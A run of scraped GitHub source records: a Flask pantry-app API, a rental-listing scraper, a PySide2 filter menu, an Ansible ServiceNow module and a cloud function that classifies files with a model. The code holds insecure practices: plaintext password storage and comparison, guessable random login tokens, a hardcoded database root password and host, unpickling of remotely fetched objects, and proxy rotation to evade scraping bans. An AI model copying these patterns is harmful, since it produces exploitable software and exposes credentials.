Name\"] = api_response_json[\"product\"][\"product_name_en\"] \n all_nutrition_info = api_response_json[\"product\"][\"nutriments\"]\n parsed_nutrition_info = {}\n parsed_nutrition_info[\"Status\"] = \"ERROR\"\n nutrition_fields = [\"fat\",\"carbohydrates\",\"cholesterol\",\"proteins\",\"sodium\" ]\n\n nutrion_fields_read = 0 \n for entry in nutrition_fields:\n try: \n parsed_nutrition_info[entry] = all_nutrition_info[entry] \n nutrion_fields_read += 1\n except:\n pass\n if nutrion_fields_read >= 1:\n parsed_nutrition_info[\"Status\"] = \"OK\"\n response_dict[\"Nutrition\"] = parsed_nutrition_info\n response_dict[\"Category\"] = \"Misc\"\n try:\n cat = api_response_json[\"product\"][\"categories_tags\"][0]\n if 'en:' in cat:\n response_dict[\"Category\"] = cat[cat.index('en:')+len('en:'):]\n except:\n pass\n return response_dict\n else:\n response_dict['Status'] = \"NOT_FOUND\"\n return response_dict\n except:\n response_dict['Status'] = \"NOT_FOUND\"\n return response_dict\n\n@app.route('/api/selection/', methods=['POST'])\ndef selection():\n \"\"\"\n Handles converting the selected parts of a scanned item official name into their common ingredient names.\n\n INPUT:\n Expects a JSON object in the request data that is in this format:\n {\n \"Selection\": [\n \"Spaghetti\", \n ],\n \"Official Name\": \"Rossco Thin Spaghetti\"\n }\n\n \n OUTPUT:\n { \n \"Category\": \"Long Noodles\",\n \"Common Name\": \"spaghetti\",\n \"Official Name\": \"Rossco Thin Spaghetti\"\n }\n\n\n Sample curl tester:\n curl -d '{\"Selection\": [\"spaghetti\"], \"Official Name\": \"Rossco Thin Spaghetti\"}' -H \"Content-Type: application/json\" -X POST http://127.0.0.1:5000/api/selection/\n \"\"\"\n info_dict = request.json\n\n user_selection = info_dict[\"Selection\"]\n response_dict = {}\n response_dict['Status'] = \"ERROR\"\n try:\n data = findCommonNameFromOfficial(user_selection)\n if data[1] == -1:\n data = findCommonNameFromOfficial(user_selection, True)\n response_dict['Status'] = \"OK\"\n response_dict['Ingredient ID'] = data[1]\n response_dict['Official Name'] = info_dict[\"Official Name\"]\n response_dict['Category'] = \"DEPREICATED\"\n response_dict['Common Name'] = data[0]\n except:\n pass\n return response_dict\n\n\n@app.route('/api/user/get/', methods=['POST'])\ndef userinfo():\n info_dict = request.json\n key = info_dict[\"key\"]\n response = {}\n response[\"Status\"] = \"ERROR\"\n try:\n user = dbConnector.getUserInfoFromKey(key)\n if user:\n response[\"Status\"] = \"OK\"\n response[\"Display Name\"] = user[\"display_name\"]\n response[\"pantry_id\"] = user[\"pantry_id\"]\n else:\n response[\"Status\"] = \"INVALID TOKEN\"\n except:\n print(\"No database connection\")\n pass\n return response\n\n@app.route('/api/user/new/', methods=['POST'])\ndef makeNewUser():\n \"\"\" \n Handles adding a new user to the database\n\n INPUT:\n Expects a JSON object in the request data that is in this format:\n {\n \"password\": \"password\",\n \"email\": \"email@email.com\",\n \"display_name\" \"Display Name\"\n }\n\n \n OUTPUT:\n { \n \"Status\": \"OK\", \n }\n\n\n TODO:\n -Hash Passwords Before Sending\n -Email Verification\n -Handle different cases in the response i.e\n -Invalid Password\n -Invalid Email\n \n Sample curl tester: \n curl -d '{\"email\":\"rhys@rhyssullivan.com\", \"password\":\"passowrd\", \"display_name\":\"rhysS\"}' -H \"Content-Type: application/json\" -X POST http://127.0.0.1:5000/api/user/new \n \"\"\"\n\n # TODO ADD ERROR HANDLING\n info_dict = request.json\n password = info_dict['password']\n username = info_dict['email']\n display_name = info_dict['display_name']\n\n dbConnector.addNewUser(username, password, display_name)\n\n login_token = random.randrange(\n 0, 1000000) # TODO: Generate on client? Encrypt before sending back?\n response_dict = {}\n while (dbConnector.checkIfTokenIsInUse(login_token)):\n login_token = random.randrange(0, 1000000)\n\n user_info = dbConnector.getUserInformation(username)\n dbConnector.updateUserLoginToken(user_info[0], login_token)\n response_dict = {}\n response_dict[\"login_token\"] = login_token\n response_dict[\"Status\"] = \"OK\"\n\n try:\n user = dbConnector.getUserInfoFromKey(login_token)\n if user: \n response_dict[\"Display Name\"] = user[\"display_name\"]\n response_dict[\"pantry_id\"] = user[\"pantry_id\"] \n except:\n print(\"No database connection\")\n pass\n\n return response_dict\n\n@app.route('/api/user/login/', methods=['POST'])\ndef login():\n info_dict = request.json\n password = info_dict['password']\n email = info_dict['email']\n\n user_info = dbConnector.getUserInformation(email)\n\n response_dict = {}\n response_dict[\"Status\"] = \"ERROR\" \n try:\n server_password = user_info[2] # TODO Split up into specific password call? Indexing directly is ugly and insecure\n display_name = user_info[3] \n if server_password == password:\n response_dict[\"display_name\"] = display_name\n response_dict[\"Status\"] = \"OK\"\n response_dict[\"pantry_id\"] = user_info[5]\n \n login_token = random.randrange(0, 1000000) # TODO: Generate on client? Encrypt before sending back? \n while (dbConnector.checkIfTokenIsInUse(login_token)):\n login_token = random.randrange(0, 1000000)\n\n dbConnector.updateUserLoginToken(user_info[0], login_token)\n response_dict[\"login_token\"] = login_token\n return response_dict\n else:\n response_dict[\"Status\"] = \"INVALID PASSWORD\"\n return response_dict\n except TypeError:\n response_dict[\"Status\"] = \"INVALID EMAIL\"\n return response_dict\n\n@app.route('/api/user/pantry/get/', methods=['POST'])\ndef getUserPantryItems():\n # curl -d '{\"key\":868911}' -H \"Content-Type: application/json\" -X POST http://127.0.0.1:5000/api/user/pantry/get\n info_dict = request.json\n key = info_dict[\"key\"]\n response = {}\n response[\"Status\"] = \"OK\"\n user = dbConnector.getUserInfoFromKey(key)\n if user:\n pantry_items = dbConnector.getAllItemsInPantry(user[\"pantry_id\"])\n\n items = []\n for item in pantry_items:\n item_dict = {}\n item_dict[\"name\"] = item[4]\n item_dict[\"dispName\"] = item[4]\n item_dict[\"quantity\"] = item[9]\n try: \n exp_date_str = item[2] \n formatted_date = exp_date_str.strftime('%B %dth, %Y') \n item_dict[\"expDate\"] = formatted_date \n except:\n item_dict[\"expDate\"] = \"\"\n item_dict[\"price\"] = item[6]\n item_dict[\"id\"] = item[5]\n items.append(item_dict)\n if len(items) != 0:\n response[\"items\"] = items\n else:\n response[\"Status\"] = \"EMPTY\"\n else:\n response[\"Status\"] = \"INVALID TOKEN\"\n return response\n\n@app.route('/api/user/pantry/add/', methods=['POST'])\ndef addUserPantryItem():\n info_dict = request.json\n key = info_dict[\"key\"]\n user = dbConnector.getUserInfoFromKey(key)\n pantry_item = info_dict # TODO: Add input validation\n response_dict = {}\n if user:\n dbConnector.addItem(user[\"pantry_id\"], pantry_item)\n response_dict[\"Status\"] = \"OK\"\n else:\n response_dict[\"Status\"] = \"INVALID TOKEN\"\n return response_dict\n\n\n@app.route('/api/user/pantry/remove/', methods=['POST'])\ndef removeUserPantryItem():\n info_dict = request.json\n key = info_dict[\"key\"]\n user = dbConnector.getUserInfoFromKey(key)\n response_dict = {}\n try:\n item_id = info_dict[\"item_id\"]\n print(item_id)\n except:\n response_dict[\"Status\"] = \"INVALID ITEM ID\"\n return response_dict\n if user:\n dbConnector.deleteItemFromPantry(user[\"pantry_id\"], item_id)\n response_dict[\"Status\"] = \"OK\"\n else:\n response_dict[\"Status\"] = \"INVALID TOKEN\"\n return response_dict\n\n\n@app.route('/api/user/pantry/recipes/matching', methods=['POST'])\ndef getMatchingRecipes():\n # curl -d '{\"key\":'685309'}' -H \"Content-Type: application/json\" -X POST http://127.0.0.1:5000/api/user/pantry/recipes/matching\n info_dict = request.json\n key = info_dict[\"key\"]\n user = dbConnector.getUserInfoFromKey(key)\n response_dict = {}\n if user:\n try:\n recipe_matches = dbConnector.getMatchingRecipes(user[\"pantry_id\"], min_number_matched_ingredients=3)\n response_dict[\"Status\"] = \"OK\"\n recipe_ids = [x[1] for x in recipe_matches]\n \n mat = dbConnector.getRecipesByIDs(recipe_ids)\n if len(mat) > 10:\n mat = mat[:9]\n response_dict[\"recipes\"] = mat\n except:\n response_dict[\"Status\"] = \"NO MATCHES\"\n else:\n response_dict[\"Status\"] = \"INVALID TOKEN\"\n return response_dict\n\n@app.route('/api/user/pantry/nutrition/', methods=['POST'])\ndef getPantryNutritionInfo():\n info_dict = request.json\n key = info_dict[\"key\"]\n user = dbConnector.getUserInfoFromKey(key) \n response_dict = {}\n if user: \n response_dict[\"Status\"] = \"OK\"\n try:\n response_dict[\"Nutrition Info\"] = dbConnector.getPantryNutritionInfo(user[\"pantry_id\"])\n except:\n response_dict[\"Status\"] = \"ERROR\" \n else:\n response_dict[\"Status\"] = \"INVALID TOKEN\"\n return response_dict\n \n@app.route('/api/user/pantry/price/', methods=['POST'])\ndef getPantryPriceInfo():\n info_dict = request.json\n key = info_dict[\"key\"]\n user = dbConnector.getUserInfoFromKey(key)\n response_dict = {}\n if user: \n response_dict[\"Status\"] = \"OK\"\n response_dict[\"Price Info\"] = dbConnector.getPantryPriceInfo(user[\"pantry_id\"])\n else:\n response_dict[\"Status\"] = \"INVALID TOKEN\"\n return response_dict\n\n@app.route('/api/user/update/name/', methods=['POST'])\ndef changeName():\n info_dict = request.json\n key = info_dict[\"key\"]\n response = {}\n response[\"Status\"] = \"OK\"\n user = dbConnector.getUserInfoFromKey(key)\n if user:\n try: \n new_name = info_dict[\"new_name\"] \n print(new_name) \n dbConnector.changeName(new_name, key)\n except:\n pass \n else:\n response[\"Status\"] = \"INVALID TOKEN\"\n return response\n\n@app.route('/api/user/pantry/join/', methods=['POST'])\ndef changePantry():\n info_dict = request.json\n key = info_dict[\"key\"]\n response = {}\n response[\"Status\"] = \"OK\"\n user = dbConnector.getUserInfoFromKey(key)\n if user:\n try: \n new_pantry_id = info_dict[\"new_id\"] \n dbConnector.changePantry(new_pantry_id, key)\n except:\n pass \n else:\n response[\"Status\"] = \"INVALID TOKEN\"\n return response\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\")","repo_name":"cLaBounty/Shelf-Life","sub_path":"Server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":13569,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"17402205559","text":"'''\n爬取链家租房信息\n'''\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\n\n\ndef text():\n ips = [\"115.219.108.246:8010\", \"117.88.5.135:3000\", \"114.223.208.165:8118\"]\n Lists = []\n for page in range(2,100):\n url = \"https://sz.lianjia.com/zufang/pg%s/#contentList\" % page\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'}\n ip = ips[-1]\n IP = {'http': ip}\n data = requests.get(url=url, headers=headers, proxies=IP)\n # data = requests.get(url=url,headers=headers)\n data = data.text\n if data.status_code == 200:\n soup = BeautifulSoup(data, 'lxml', from_encoding='utf-8')\n data = soup.select('div[class=\"content__list\"]')[0]\n data1 = data.select('div[class=\"content__list--item\"]')\n for i in data1:\n data = i.select('div[class=\"content__list--item--main\"]')[0]\n des = data.select('p[class=\"content__list--item--des\"]')[0]\n diqu = des.find_all(\"a\")[0].text\n jiedao = des.find_all(\"a\")[1].text\n xiaoqu = des.find_all(\"a\")[2].text\n mianji = des.find_all(\"i\")[0].next_sibling.strip()\n price = data.select('span[class=\"content__list--item-price\"]')[0]\n price = price.text\n Lists.append([diqu, jiedao, xiaoqu, mianji, price])\n # print(diqu,jiedao,xiaoqu,mianji,price)\n else:\n ips.pop()\n print(\"在第%s次IP被封\" % i)\n # print(s)\n continue\n return pd.DataFrame(Lists, columns=['地区', '街道', '小区', '面积', '租金'])\n\n\nprint(text())\n\ndf = text()\ndf.to_csv('链家.csv', encoding='utf_8_sig', index=False)","repo_name":"qianxunchen/Reptiles","sub_path":"链家房源.py","file_name":"链家房源.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"32916578808","text":"import logging\r\nimport os\r\nimport sys\r\nfrom typing import List, Optional, Tuple\r\n\r\nfrom PySide2.QtCore import *\r\nfrom PySide2.QtGui import *\r\nfrom PySide2.QtWidgets import *\r\n\r\nfrom qspreadsheet import resources_rc\r\nfrom qspreadsheet.common import LEFT, SER, standard_icon\r\nfrom qspreadsheet.custom_widgets import LabeledLineEdit\r\nfrom qspreadsheet.dataframe_model import DataFrameModel\r\nfrom qspreadsheet.worker import Worker\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\nclass FilterWidgetAction(QWidgetAction):\r\n \"\"\"Checkboxed list filter menu\"\"\"\r\n\r\n all_deselected = Signal(bool)\r\n\r\n def __init__(self, parent=None) -> None:\r\n \"\"\"Checkbox list filter menu\r\n\r\n Arguments\r\n ----------\r\n \r\n parent: (Widget)\r\n Parent\r\n \r\n menu: (QMenu)\r\n Menu object this list is located on\r\n \"\"\"\r\n super(FilterWidgetAction, self).__init__(parent)\r\n\r\n # Build Widgets\r\n widget = QWidget()\r\n layout = QVBoxLayout()\r\n\r\n self.str_filter = LabeledLineEdit('Filter', parent=parent)\r\n layout.addWidget(self.str_filter)\r\n\r\n self.list = QListWidget(widget)\r\n self.list.setStyleSheet(\"\"\"\r\n QListView::item:selected {\r\n background: rgb(195, 225, 250);\r\n color: rgb(0, 0, 0);\r\n } \"\"\")\r\n self.list.setMinimumHeight(150)\r\n self.list.setUniformItemSizes(True)\r\n\r\n layout.addWidget(self.list)\r\n\r\n # This button in made visible if the number \r\n # of items to show is more than the initial limit\r\n btn = QPushButton('Not all items showing')\r\n \r\n btn.setIcon(standard_icon('MessageBoxWarning'))\r\n btn.setVisible(False)\r\n layout.addWidget(btn)\r\n self.show_all_btn = btn\r\n self.select_all_item: Optional[QListWidgetItem] = None\r\n\r\n widget.setLayout(layout)\r\n self.setDefaultWidget(widget)\r\n\r\n # Signals/slots\r\n self.list.itemChanged.connect(self.on_listitem_changed)\r\n self.num_checked = 0\r\n \r\n def addItem(self, item: QListWidgetItem):\r\n if item.checkState() == Qt.Checked:\r\n self.num_checked += 1\r\n self.list.addItem(item)\r\n\r\n def addSelectAllItem(self, state: Qt.CheckState) -> QListWidgetItem:\r\n \"\"\"Adding '(Select All)' item at the beginning of the QListWidget\"\"\"\r\n item = QListWidgetItem('(Select All)')\r\n item.setFlags(item.flags() | Qt.ItemIsUserCheckable)\r\n item.setCheckState(state)\r\n self.select_all_item = item\r\n self.list.insertItem(0, item)\r\n\r\n return item\r\n\r\n def clear(self):\r\n self.list.clear()\r\n self.num_checked = 0\r\n self.all_deselected.emit(True)\r\n\r\n @property\r\n def list_items_count(self) -> int:\r\n \"\"\"Number of list items, excluding the '(Select All)' item\"\"\"\r\n return self.list.count() - 1\r\n \r\n def on_listitem_changed(self, item: QListWidgetItem):\r\n\r\n self.list.blockSignals(True)\r\n if item is self.select_all_item:\r\n # Handle \"select all\" item click\r\n state = item.checkState()\r\n # Select/deselect all items\r\n for i in range(self.list.count()):\r\n itm = self.list.item(i)\r\n if itm is self.select_all_item:\r\n continue\r\n itm.setCheckState(state)\r\n \r\n all_unchecked = (state == Qt.Unchecked)\r\n # -1 is for the select_all_item\r\n self.num_checked = 0 if all_unchecked else self.list_items_count\r\n else:\r\n # Non \"select all\" item \r\n if item.checkState() == Qt.Unchecked:\r\n self.num_checked -= 1\r\n elif item.checkState() == Qt.Checked:\r\n self.num_checked += 1\r\n assert(self.num_checked >= 0)\r\n \r\n # figure out what \"select all\" should be\r\n state = Qt.Checked if self.num_checked == self.list_items_count else Qt.Unchecked\r\n # if state changed\r\n if state != self.select_all_item.checkState():\r\n self.select_all_item.setCheckState(state)\r\n\r\n if self.num_checked == 0:\r\n self.all_deselected.emit(True)\r\n else:\r\n self.all_deselected.emit(False)\r\n\r\n self.list.scrollToItem(item)\r\n self.list.blockSignals(False)\r\n\r\n def values(self) -> List[str]:\r\n checked = []\r\n for i in range(self.list.count()):\r\n itm = self.list.item(i)\r\n if itm is self.select_all_item:\r\n continue\r\n if itm.checkState() == Qt.Checked:\r\n checked.append(itm.text())\r\n return checked\r\n","repo_name":"stanislavsabev/qspreadsheet.old","sub_path":"qspreadsheet/menus.py","file_name":"menus.py","file_ext":"py","file_size_in_byte":4770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"38881957847","text":"# Main Context\n# Author: NaveenKumar Namachivayam at QAInsights.com\n\nfrom flask import Flask, render_template, request, redirect, url_for, flash, jsonify\nfrom explain import explain_commands\n\napp = Flask(__name__, template_folder='templates', static_folder='static')\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return render_template('home.html', isHome=True)\n\n\n@app.route('/explain', methods=['GET'])\ndef explain():\n commands = request.args['usercommand'].strip()\n commands = commands.split(' ')\n print(f\"User input is {commands}\")\n result = {}\n try:\n for command in commands:\n print(f\"from the form {command}\")\n k, v = explain_commands(command)\n print(f\"In main {k} {v}\")\n result[k] = v\n print(result)\n except TypeError:\n pass\n return render_template('explain.html', string=result)\n\n\nif __name__ == '__main__':\n app.run(port=7000, debug=True)","repo_name":"QAInsights/Explain-JMeter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"29634095605","text":"from __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\nANSIBLE_METADATA = {\n 'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'\n}\n\nDOCUMENTATION = '''\n---\nmodule: snow_record_find\n\nshort_description: Search for multiple records from ServiceNow\n\nversion_added: \"2.5\"\n\ndescription:\n - Gets multiple records from a specified table from ServiceNow\n based on a query dictionary.\n\noptions:\n instance:\n description:\n - The service now instance name\n required: true\n username:\n description:\n - User to connect to ServiceNow as\n required: true\n password:\n description:\n - Password for username\n required: true\n table:\n description:\n - Table to query for records\n required: false\n default: incident\n query:\n description:\n - Dict to query for records\n required: true\n max_records:\n description:\n - Maximum number of records to return\n required: false\n default: 20\n order_by:\n description:\n - Field to sort the results on. Can prefix with \"-\" or \"+\" to\n change decending or ascending sort order.\n default: \"-created_on\"\n required: false\n return_fields:\n description:\n - Fields of the record to return in the json\n required: false\n default: all fields\n\nrequirements:\n - python pysnow (pysnow)\n\nauthor:\n - Tim Rightnour (@garbled1)\n'''\n\nEXAMPLES = '''\n- name: Search for incident assigned to group, return specific fields\n snow_search_records:\n username: ansible_test\n password: my_password\n instance: dev99999\n table: incident\n query:\n assignment_group: d625dccec0a8016700a222a0f7900d06\n return_fields:\n - number\n - opened_at\n\n- name: Find open standard changes with my template\n snow_record_find:\n username: ansible_test\n password: my_password\n instance: dev99999\n table: change_request\n query:\n AND:\n equals:\n active: \"True\"\n type: \"standard\"\n u_change_stage: \"80\"\n contains:\n u_template: \"MY-Template\"\n return_fields:\n - sys_id\n - number\n - sys_created_on\n - sys_updated_on\n - u_template\n - active\n - type\n - u_change_stage\n - sys_created_by\n - description\n - short_description\n'''\n\nRETURN = '''\nrecord:\n description: The full contents of the matching ServiceNow records as a list of records.\n type: dict\n returned: always\n'''\n\nfrom ansible.module_utils.basic import AnsibleModule\n# Pull in pysnow\nHAS_PYSNOW = False\ntry:\n import pysnow\n from pysnow.exceptions import NoResults\n HAS_PYSNOW = True\n\nexcept ImportError:\n pass\n\n\nclass BuildQuery(object):\n '''\n This is a BuildQuery manipulation class that constructs\n a pysnow.QueryBuilder object based on data input.\n '''\n\n def __init__(self, module):\n self.module = module\n self.logic_operators = [\"AND\", \"OR\", \"NQ\"]\n self.condition_operator = {\n 'equals': self._condition_closure,\n 'not_equals': self._condition_closure,\n 'contains': self._condition_closure,\n 'not_contains': self._condition_closure,\n 'starts_with': self._condition_closure,\n 'ends_with': self._condition_closure,\n 'greater_than': self._condition_closure,\n 'less_than': self._condition_closure,\n }\n self.accepted_cond_ops = self.condition_operator.keys()\n self.append_operator = False\n self.simple_query = True\n self.data = module.params['query']\n\n def _condition_closure(self, cond, query_field, query_value):\n self.qb.field(query_field)\n getattr(self.qb, cond)(query_value)\n\n def _iterate_fields(self, data, logic_op, cond_op):\n if isinstance(data, dict):\n for query_field, query_value in data.items():\n if self.append_operator:\n getattr(self.qb, logic_op)()\n self.condition_operator[cond_op](cond_op, query_field, query_value)\n self.append_operator = True\n else:\n self.module.fail_json(msg='Query is not in a supported format')\n\n def _iterate_conditions(self, data, logic_op):\n if isinstance(data, dict):\n for cond_op, fields in data.items():\n if (cond_op in self.accepted_cond_ops):\n self._iterate_fields(fields, logic_op, cond_op)\n else:\n self.module.fail_json(msg='Supported conditions: {0}'.format(str(self.condition_operator.keys())))\n else:\n self.module.fail_json(msg='Supported conditions: {0}'.format(str(self.condition_operator.keys())))\n\n def _iterate_operators(self, data):\n if isinstance(data, dict):\n for logic_op, cond_op in data.items():\n if (logic_op in self.logic_operators):\n self.simple_query = False\n self._iterate_conditions(cond_op, logic_op)\n elif self.simple_query:\n self.condition_operator['equals']('equals', logic_op, cond_op)\n break\n else:\n self.module.fail_json(msg='Query is not in a supported format')\n else:\n self.module.fail_json(msg='Supported operators: {0}'.format(str(self.logic_operators)))\n\n def build_query(self):\n self.qb = pysnow.QueryBuilder()\n self._iterate_operators(self.data)\n return (self.qb)\n\n\ndef run_module():\n # define the available arguments/parameters that a user can pass to\n # the module\n module_args = dict(\n instance=dict(default=None, type='str', required=True),\n username=dict(default=None, type='str', required=True, no_log=True),\n password=dict(default=None, type='str', required=True, no_log=True),\n table=dict(type='str', required=False, default='incident'),\n query=dict(default=None, type='dict', required=True),\n max_records=dict(default=20, type='int', required=False),\n order_by=dict(default='-created_on', type='str', required=False),\n return_fields=dict(default=None, type='list', required=False)\n )\n\n module = AnsibleModule(\n argument_spec=module_args,\n supports_check_mode=True\n )\n\n # check for pysnow\n if not HAS_PYSNOW:\n module.fail_json(msg='pysnow module required')\n\n result = dict(\n changed=False,\n instance=module.params['instance'],\n table=module.params['table'],\n query=module.params['query'],\n max_records=module.params['max_records'],\n return_fields=module.params['return_fields']\n )\n\n # do the lookup\n try:\n conn = pysnow.Client(instance=module.params['instance'],\n user=module.params['username'],\n password=module.params['password'])\n except Exception as detail:\n module.fail_json(msg='Could not connect to ServiceNow: {0}'.format(str(detail)), **result)\n\n try:\n bq = BuildQuery(module)\n qb = bq.build_query()\n record = conn.query(table=module.params['table'],\n query=qb)\n if module.params['return_fields'] is not None:\n res = record.get_multiple(fields=module.params['return_fields'],\n limit=module.params['max_records'],\n order_by=[module.params['order_by']])\n else:\n res = record.get_multiple(limit=module.params['max_records'],\n order_by=[module.params['order_by']])\n except:\n module.fail_json(msg='Failed to find record: {0}'.format(str(detail)), **result)\n\n try:\n result['record'] = list(res)\n except NoResults:\n result['record'] = []\n\n module.exit_json(**result)\n\n\ndef main():\n run_module()\n\nif __name__ == '__main__':\n main()\n","repo_name":"garbled1/ansible_modules","sub_path":"library/snow_record_find.py","file_name":"snow_record_find.py","file_ext":"py","file_size_in_byte":8116,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"9577221577","text":"# Author / Modifier: Parth Panchal\n# Credit : request the remote object using URL (source : https://docs.python.org/3.2/library/urllib.request.html)\n# Credit : STACKOVERFLOW loading the pickle file object (source : https://stackoverflow.com/questions/35067957/how-to-read-pickle-file)\n# Credit : Scikit learn document for obtaning vectorizer from the object (source : https://scikit-learn.org/stable/modules/generated/sklearn.feature_extraction.text.CountVectorizer.html)\n\nfrom google.cloud import storage\nimport urllib.request as request\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport mysql.connector\nimport pickle\ndef hello_gcs(event, context):\n \"\"\"Triggered by a change to a Cloud Storage bucket.\n Args:\n event (dict): Event payload.\n context (google.cloud.functions.Context): Metadata for the event.\n \"\"\"\n bucket_name = event['bucket']\n source_blob_name = event['name']\n print(bucket_name)\n print(source_blob_name)\n storage_client = storage.Client()\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(source_blob_name)\n content = blob.download_as_string()\n print(content)\n input_array = []\n input_array.append(content)\n modelRequest = request.urlopen(\"https://storage.googleapis.com/trainingresourcebucket/training_20200726_213915/kmeans_model.pkl\")\n wordsUrl = request.urlopen(\"https://storage.googleapis.com/trainingresourcebucket/training_vectorizer_20200726_213916/vectorizer_model.pkl\")\n model = pickle.load (modelRequest)\n words = pickle.load(wordsUrl)\n vectorizerLoader = TfidfVectorizer(vocabulary=words)\n Y = vectorizerLoader.fit_transform(input_array)\n outputPrediction = model.predict(Y)\n resultantPredictionArray = []\n resultantPredictionArray = outputPrediction.astype(int)\n cluster_number = resultantPredictionArray[0]\n cluster_number = str(cluster_number)\n print(cluster_number)\n mydb = mysql.connector.connect(\n host=\"35.192.37.150\",\n user=\"root\",\n password=\"root12345\",\n database=\"store_file_cluster_db\"\n )\n mycursor = mydb.cursor()\n sql = \"INSERT INTO `store_file_cluster_db`.`cluster_file_info` (`file_name`, `cluster_number`) VALUES (%s, %s);\"\n val = (source_blob_name, cluster_number)\n mycursor.execute(sql, val)\n\n mydb.commit()\n\n print(mycursor.rowcount, \"record inserted.\")","repo_name":"gamidiv10/serverless-lms","sub_path":"Machine Learning /cloudFunctionForPrediction/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"29411850323","text":"\nimport logging\nimport pydantic\nimport starlite\nfrom typing import Literal, List\nfrom starlite import Controller, get\n\nlogging.basicConfig(level=logging.INFO)\n\n\nclass Cat(pydantic.BaseModel):\n name: str\n color: Literal['orange', 'brown']\n age: int\n\n\nclass CatController(Controller):\n path = \"/cats\"\n\n @get()\n async def list_cats(self) -> List[Cat]:\n return [Cat(name='talon', color='brown', age='18')]\n\n\nif __name__ == '__main__':\n logging.info('Starting')\n\n talon = Cat(name='talon', color='brown', age='18')\n print(talon)\n\n app = starlite.Starlite(route_handlers=[CatController])\n pass\n","repo_name":"KodingForKittehs/StarliteTest","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"9530100843","text":"from __future__ import unicode_literals\nfrom ..model.managed_app_data_encryption_type import ManagedAppDataEncryptionType\nfrom ..model.managed_mobile_app import ManagedMobileApp\nfrom ..model.managed_app_policy_deployment_summary import ManagedAppPolicyDeploymentSummary\nfrom ..one_drive_object_base import OneDriveObjectBase\n\n\nclass IosManagedAppProtection(OneDriveObjectBase):\n\n def __init__(self, prop_dict={}):\n self._prop_dict = prop_dict\n\n @property\n def app_data_encryption_type(self):\n \"\"\"\n Gets and sets the appDataEncryptionType\n \n Returns: \n :class:`ManagedAppDataEncryptionType`:\n The appDataEncryptionType\n \"\"\"\n if \"appDataEncryptionType\" in self._prop_dict:\n if isinstance(self._prop_dict[\"appDataEncryptionType\"], OneDriveObjectBase):\n return self._prop_dict[\"appDataEncryptionType\"]\n else :\n self._prop_dict[\"appDataEncryptionType\"] = ManagedAppDataEncryptionType(self._prop_dict[\"appDataEncryptionType\"])\n return self._prop_dict[\"appDataEncryptionType\"]\n\n return None\n\n @app_data_encryption_type.setter\n def app_data_encryption_type(self, val):\n self._prop_dict[\"appDataEncryptionType\"] = val\n\n @property\n def minimum_required_sdk_version(self):\n \"\"\"\n Gets and sets the minimumRequiredSdkVersion\n \n Returns:\n str:\n The minimumRequiredSdkVersion\n \"\"\"\n if \"minimumRequiredSdkVersion\" in self._prop_dict:\n return self._prop_dict[\"minimumRequiredSdkVersion\"]\n else:\n return None\n\n @minimum_required_sdk_version.setter\n def minimum_required_sdk_version(self, val):\n self._prop_dict[\"minimumRequiredSdkVersion\"] = val\n\n @property\n def deployed_app_count(self):\n \"\"\"\n Gets and sets the deployedAppCount\n \n Returns:\n int:\n The deployedAppCount\n \"\"\"\n if \"deployedAppCount\" in self._prop_dict:\n return self._prop_dict[\"deployedAppCount\"]\n else:\n return None\n\n @deployed_app_count.setter\n def deployed_app_count(self, val):\n self._prop_dict[\"deployedAppCount\"] = val\n\n @property\n def face_id_blocked(self):\n \"\"\"\n Gets and sets the faceIdBlocked\n \n Returns:\n bool:\n The faceIdBlocked\n \"\"\"\n if \"faceIdBlocked\" in self._prop_dict:\n return self._prop_dict[\"faceIdBlocked\"]\n else:\n return None\n\n @face_id_blocked.setter\n def face_id_blocked(self, val):\n self._prop_dict[\"faceIdBlocked\"] = val\n\n @property\n def apps(self):\n \"\"\"Gets and sets the apps\n \n Returns: \n :class:`AppsCollectionPage`:\n The apps\n \"\"\"\n if \"apps\" in self._prop_dict:\n return AppsCollectionPage(self._prop_dict[\"apps\"])\n else:\n return None\n\n @property\n def deployment_summary(self):\n \"\"\"\n Gets and sets the deploymentSummary\n \n Returns: \n :class:`ManagedAppPolicyDeploymentSummary`:\n The deploymentSummary\n \"\"\"\n if \"deploymentSummary\" in self._prop_dict:\n if isinstance(self._prop_dict[\"deploymentSummary\"], OneDriveObjectBase):\n return self._prop_dict[\"deploymentSummary\"]\n else :\n self._prop_dict[\"deploymentSummary\"] = ManagedAppPolicyDeploymentSummary(self._prop_dict[\"deploymentSummary\"])\n return self._prop_dict[\"deploymentSummary\"]\n\n return None\n\n @deployment_summary.setter\n def deployment_summary(self, val):\n self._prop_dict[\"deploymentSummary\"] = val\n\n","repo_name":"MIchaelMainer/msgraph-v10-models-python","sub_path":"models/ios_managed_app_protection.py","file_name":"ios_managed_app_protection.py","file_ext":"py","file_size_in_byte":4037,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"23751974734","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 14 01:18:44 